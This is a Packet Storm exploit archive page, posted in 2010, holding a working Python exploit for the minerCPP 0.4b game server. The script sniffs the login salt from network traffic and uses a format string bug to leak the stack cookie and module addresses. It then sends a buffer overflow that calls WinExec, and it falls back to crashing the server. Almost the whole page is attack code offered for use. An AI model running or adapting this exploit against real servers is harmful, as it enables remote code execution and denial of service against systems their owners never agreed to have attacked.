what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

minerCPP 0.4b Buffer Overflow / Format String

minerCPP 0.4b Buffer Overflow / Format String
Posted Jul 6, 2010
Authored by l3D

minerCPP version 0.4b buffer overflow and format string exploit.

tags | exploit, overflow
SHA-256 | a117eb0fc346a869167c09bb1d1a5bfe46cfae62c8b29a204bfea8d1532c8db3

minerCPP 0.4b Buffer Overflow / Format String

Change Mirror Download
#!/usr/bin/env python
#minerCPP 0.4b Remote BOF+Format String Attack Exploit
#Software Link: http://sourceforge.net/projects/minercpp/
#Author: l3D
#Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
#Tested on Windows 7

#In order to make this exploit work you should sniff the salt first.
#It's sent by the software to www.minecraft.net
#You can find it in the POST data (salt=12345 for instance).
#I added a part that sniffs it automatically using pcapy.
#Furthermore, in a real attack it can be simply brute
#forced (it's only rand()). I didn't add this part in
#order to prevent abusing.

#The EAX can be influenced and the stack too.
#However, there is a stack cookie that
#prevents us to jump into our overwritten RET.
#There are no SEH nor vtable overwritings.

#So what can we do?...
#I found a format string attack vulnerability
#which lets us calculate the master cookie
#and get the ESP of the current thread.
#Unfortunately, the BOF is in another
#thread, so the ESP we've got may not match
#the ESP we need, what makes this exploit unstable.

#Code execution worked to me 10 out of 50 times.

from socket import *
from time import sleep
import pcapy, hashlib, re, struct, os, sys

print 'minerCPP 0.4b Remote BOF+Format String Attack by l3D (pupipup33@gmail.com)\n'

if len(sys.argv) < 3:
print 'Usage: python %s <host> <port> [salt]' % sys.argv[0]
print 'If salt is not specified, the exploit sniffs it automatically.'

if len(sys.argv) > 3:
salt=sys.argv[3]
else:
dev=pcapy.lookupdev()
cap=pcapy.open_live(dev, 1024, False, 0)
cap.setfilter("dst 69.175.14.242 and dst port 80")
data=cap.next()[1]
while 1:
salt=re.findall(r'salt=(\d+)', data)
if salt:
salt=salt[0]
break
data=cap.next()[1]

host=sys.argv[1]
port=int(sys.argv[2])

exp=re.compile(r'0X([0-9A-F]+)')

def md5_calc(input):
o=hashlib.md5(input)
output=o.hexdigest()
del o
return output

def pack_login(nick, x):
login='\x00\x07'
if x:
nick_hash=md5_calc(salt+nick)
nick=nick.ljust(64)
return login+nick+nick_hash
else:
return login+nick+'\x20'

def pack_msg(nick, x):
msg='\x0d\x7e'
if x:
content='/pinfo %s ' % nick
content=content.ljust(64, 'A')
else:
content='/pinfo '+nick
content=content.ljust(64)
return msg+content

def send_and_run(packet):
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
sock.send(packet)
sleep(1)
sock.close()
del sock

sleep(2)

##############################################################################################

print '[1] Stage 1: Cookie and KERNELBASE.dll ImageBase Getting'
nick='%s.%#X.%#X'
trys=0
packet=pack_msg(nick, True)

try:
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
sock.send(pack_login(nick, True))
except:
exit('[-] ERROR: Sockets error.')

data=sock.recv(2048)
while data:
if data[0]=='\x00':
print '[+] Logged in successfuly!'
sock.send(packet)
if data[0]=='\x0e':
sock.close()
exit('[-] ERROR: Wrong salt.')
if data.startswith('\x0d\x00&e') and ' is a &7' in data:
print '[+] Data has been recieved!'
nums=[int(i, 16) for i in exp.findall(data[4:])]
if nums:
data=data[4:data.find('.0X')]
if len(data)<8:
if trys < 20:
print '[!] Data is too short, trying again...'
trys+=1
sleep(1)
sock.send(packet)
else:
print '[-] ERROR: Too much trys. DoSing...'
sock.close()
sleep(1)
send_and_run(pack_login('A'*128, False))
exit()
else:
esp=nums[1]-0xf0
kernelbase, xored_esp=struct.unpack('2L', data)
cookie=xored_esp^esp
kernelbase-=0x1671
print '[+] Stage 1 completed.'
break
else:
sock.close()
exit('[-] ERROR: addresses couldn\'t be found.')
data=sock.recv(2048)

sock.close()
del sock
print
sleep(2)

##############################################################################################

print '[2] Stage 2: minerCPP.exe and kernel32.dll ImageBases Getting'
nick='%#X.%#X.%s'
packet=pack_msg(nick, False)

try:
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
sock.send(pack_login(nick, True))
except:
exit('[-] ERROR: Sockets error.')

data=sock.recv(2048)
while data:
if data[0]=='\x00':
print '[+] Logged in successfuly!'
sock.send(packet)
if data.startswith('\x0d\x00&e') and ' is a &7' in data:
print '[+] Data has been recieved!'
data=data[4:data.find(' is a &7')]
data=exp.sub('', data, 2)[2:10]
if len(data)==7:
data+='\0'
if len(data) < 8:
sock.close()
exit('[-] Data is too short, it can be because one of the adresses contains nullbyte...')
else:
kernel32, minerCPP=struct.unpack('2L', data)
kernel32-=0x4ef88
minerCPP-=0x5621
print '[+] Stage 2 completed.'
break
data=sock.recv(2048)

sock.close()
del sock
print

##############################################################################################

print '[~] Analyzed data:'
print '[+] ESP: 0x%08x' % esp
print '[+] Cookie: 0x%08x' % cookie
print '[+] KERNELBASE.dll: 0x%08x' % kernelbase
print '[+] kernel32.dll: 0x%08x' % kernel32
print '[+] minerCPP.exe: 0x%08x' % minerCPP
print
sleep(2)

##############################################################################################

print '[3] Stage 3: Buffer Overflow'

esp+=0x50
winexec=struct.pack('L', kernel32+0x8e76d)
exitprocess=struct.pack('L', kernel32+0x52aef)
calc=struct.pack('L', esp+0x98)

junk='A'*(64-len(salt))
xored_esp=struct.pack('L', esp^cookie)
ret=winexec #jump to WinExec @ kernel32.dll
ret+='JUNK'
ret+='\x10\x01\x01\x10' #readable address @ zlib1.dll
ret+=exitprocess #jump to ExitProcess @ kernel32.dll
ret+=calc #the place of the string in the stack
ret+='\x01\xFF\xFF\xFF'
ret+='JUNK'
ret+='\xFF\xFF\xFF\xFF' #exit code -1
ret+='calc' #a program to execute

packet=pack_login(junk+xored_esp+ret, False)

send_and_run(packet)
print '[+] Packet has been sent. The server should be DoSed or a code should be executed.'

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close